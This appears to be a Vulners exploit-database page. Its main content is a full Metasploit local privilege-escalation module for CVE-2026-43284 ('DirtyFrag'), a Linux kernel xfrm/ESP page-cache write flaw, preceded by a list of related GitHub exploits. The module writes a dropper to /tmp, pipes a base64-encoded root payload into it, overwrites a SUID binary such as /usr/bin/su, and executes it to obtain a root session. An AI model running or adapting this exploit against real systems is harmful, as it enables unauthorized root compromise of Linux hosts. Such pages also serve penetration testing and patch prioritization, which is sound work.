| Reporter | Title | Published | Views | Family All 606 |
|---|---|---|---|---|
| lpe-toolkit | 21 May 202619:33 | – | githubexploit | |
| Exploit for Out-of-bounds Write in Linux Linux_Kernel | 18 May 202619:32 | – | githubexploit | |
| Exploit for Write-what-where Condition in Linux Linux_Kernel | 30 May 202620:11 | – | githubexploit | |
| Exploit for Write-what-where Condition in Linux Linux_Kernel | 15 May 202606:38 | – | githubexploit | |
| DirtyFrag-Linux-Kernel-Local-Privilege-Escalation-Educational-Mirror- | 15 May 202618:00 | – | githubexploit | |
| Exploit for Write-what-where Condition in Linux Linux_Kernel | 8 May 202613:57 | – | githubexploit | |
| Exploit for Write-what-where Condition in Linux Linux_Kernel | 24 May 202612:39 | – | githubexploit | |
| Exploit for Write-what-where Condition in Linux Linux_Kernel | 30 Jun 202618:15 | – | githubexploit | |
| Exploit for Incorrect Resource Transfer Between Spheres in Linux Linux_Kernel | 8 May 202614:05 | – | githubexploit | |
| centipede | 9 May 202618:52 | – | githubexploit |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'xfrm-ESP Page-Cache Write via CVE-2026-43284',
'Description' => %q{
CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec/xfrm
subsystem affecting ESP (Encapsulating Security Payload) fragmentation. Dubbed
"DirtyFrag", the bug allows a local unprivileged user to gain write access to read-only
page-cache pages by triggering a race condition in how the kernel handles shared fragments
when processing ESP-encapsulated UDP packets. The exploit overwrites a SUID binary on disk
to execute an arbitrary payload as root.
},
'License' => MSF_LICENSE,
'Author' => [
'Hyunwoo Kim', # Discovery
'Giovanni Heward', # Original module
],
'References' => [
['CVE', '2026-43284'],
['EDB', '52585'],
['EDB', '52591'],
['URL', 'https://github.com/V4bel/dirtyfrag'],
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Platform' => [ 'linux', 'unix'],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Auto', {} ]],
'DisclosureDate' => '2026-05-08',
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_OS_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
}
)
)
register_options([
OptString.new('WRITABLE_DIR', [ true, 'Directory to write files to', '/tmp' ]),
OptString.new('SUID_BINARY_PATH', [ true, 'The path to a suid binary', '/usr/bin/su' ])
])
end
def check
dirtyfrag_modprobe = cmd_exec('ls /etc/modprobe.d/ | grep -e dirty -e dirty-frag -e dirtyfrag')
return CheckCode::Safe('The machine seems to be patched') unless dirtyfrag_modprobe.blank?
vuln_modules = %w[esp ipcomp]
return CheckCode::Unknown('The vulnerable modules have not been detected') unless kernel_modules.any? { |m| vuln_modules.include?(m) }
kernel_version = Rex::Version.new kernel_release.split('-').first
return CheckCode::Safe('The kernel version is older than the commit when bug was introduced') if kernel_version < Rex::Version.new('4.10')
CheckCode::Appears('The target is vulnerable, vulnerable module detected and no mitigation detected')
end
def exploit
suid_binary_path = datastore['SUID_BINARY_PATH']
fail_with(Failure::BadConfig, "The #{suid_binary_path} does not exists on target system") unless setuid?(suid_binary_path)
payload_dir = datastore['WRITABLE_DIR']
fail_with(Failure::NoAccess, 'Cannot write into WRITABLE_DIR, make sure you select writable directory') unless writable?(payload_dir)
arch = kernel_arch
cmd_payload = framework.payloads.create("linux/#{arch}/exec")
fail_with(Failure::NoTarget, "#{arch} targets are not supported.") if cmd_payload.nil? || !cmd_payload.options.key?('PrependSetuid')
cmd_payload.datastore['CMD'] = payload.encoded
cmd_payload.datastore['PrependSetuid'] = true
elf = cmd_payload.generate_simple('Format' => 'elf')
# add padding
elf += "\xff" * ((4 - (elf.size % 4)) % 4)
exploit_file = "#{payload_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
if live_compile?
vprint_status('Live compiling exploit on system...')
exploit_c = exploit_data('CVE-2026-43284', 'CVE_2026_43284.c')
upload_and_compile(exploit_file, exploit_c)
else
fail_with(Failure::BadConfig, 'Precompiled exploit only supported for x64, x86, Arm64 and Armel') unless [ARCH_X64, ARCH_X86, ARCH_AARCH64, ARCH_ARMLE].include?(arch)
vprint_status('Dropping pre-compiled exploit on system...')
exploit_bin = exploit_data('CVE-2026-43284', "CVE_2026_43284_#{arch}")
upload_and_chmodx(exploit_file, exploit_bin)
end
register_file_for_cleanup(exploit_file)
print_status(%(Trying to run the exploit: "echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}"))
# patch the setuid file
response = cmd_exec("echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}")
fail_with(Failure::NotVulnerable, 'The target machine does not seem to be vulnerable') unless response.include?('payload delivered')
print_status('Running the payload')
# run the payload
cmd_exec(suid_binary_path.to_s)
end
def on_new_session(session)
print_status('Restoring balance in galaxy')
if session.type.eql?('meterpreter')
session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
session.sys.process.execute('/bin/sh', "-c 'echo 3 > /proc/sys/vm/drop_caches")
else
session.shell_command_token('echo 3 > /proc/sys/vm/drop_caches')
end
super
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation